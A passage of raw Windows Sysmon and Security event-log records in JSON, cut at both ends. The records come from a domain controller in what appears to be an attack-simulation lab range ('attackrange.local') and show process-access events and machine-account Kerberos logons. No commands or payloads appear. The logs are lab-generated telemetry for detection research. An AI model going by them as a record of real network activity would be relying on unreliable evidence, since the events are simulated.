06:59:29.648","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12D1-5F25-0000-00106FE70900}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6948,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:29.648\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12D1-5F25-0000-00106FE70900}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:29.648","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12D1-5F25-0000-00106FE70900}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6949,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:29.758\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12D1-5F25-0000-0010C2EA0900}\r\nTargetProcessId: 4804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:29.758","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12D1-5F25-0000-0010C2EA0900}","TargetProcessId":"4804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6950,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:29.758\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12D1-5F25-0000-0010C2EA0900}\r\nTargetProcessId: 4804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:29.758","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12D1-5F25-0000-0010C2EA0900}","TargetProcessId":"4804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6951,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:29.758\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12D1-5F25-0000-0010C2EA0900}\r\nTargetProcessId: 4804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:29.758","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12D1-5F25-0000-0010C2EA0900}","TargetProcessId":"4804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220682,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9EECA\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x9eeca","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220683,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x9EECA\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t52726\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x9eeca","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"52726","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220684,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9EECA\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x9eeca","LogonType":"3","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220685,"ProcessID":864,"ThreadID":3032,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9EF36\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x9ef36","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220686,"ProcessID":864,"ThreadID":3032,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x9EF36\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t52727\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x9ef36","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"52727","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220687,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9EF36\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x9ef36","LogonType":"3","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6952,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:30.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files 